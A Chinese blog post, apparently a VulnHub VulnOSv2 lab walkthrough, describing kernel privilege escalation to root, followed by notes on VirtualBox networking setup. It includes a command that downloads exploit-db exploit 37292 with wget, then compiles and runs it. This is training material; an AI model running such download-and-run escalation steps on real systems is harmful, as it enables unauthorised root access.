上期中说到vulnhub之VulnOSv2的实践留了个尾巴,本期继续实践提权,
用webmin登录到系统后,whoami看不是root,当然就很多事儿干不了,
查看一下系统信息,
到网上搜一下这个内核版本有没有提权漏洞和利用,
最后这个就是,下载漏洞利用代码,wget https://www.exploit-db.com/download/37292,
编译出来可执行文件并提权,mv 37292 shell.c,gcc -o shell shell.c,./shell,
再whoami看就是root了,能干的事儿就多了。
说是字数不够不让发表,就再凑点儿,开始做今天这个实践的时候选择的还是hostonly网络,但是让能上公网的wifi网卡给hostonly网卡做了共享,也就让它改成了192.168.137.0/24网络,hostonly网卡的地址确实改成了192.168.137.1,但是启动虚机后发现分配到的还是192.168.56.0/24网络的地址,尝试了把hostonly网络的dhcp关掉以及把dhcp里的网络改成192.168.137.0/24,都无法让虚机分配到192.168.137.0/24网络的地址,看来virtualbox还是没有workstation易用的,为了完成今天这个实践,后来就不用hostonly网卡了,而是改成了桥接网卡,直接桥接到能上公网的wifi网卡上,虚机直接dhcp到可以上公网的地址。
领取专属 10元无门槛券
私享最新 技术干货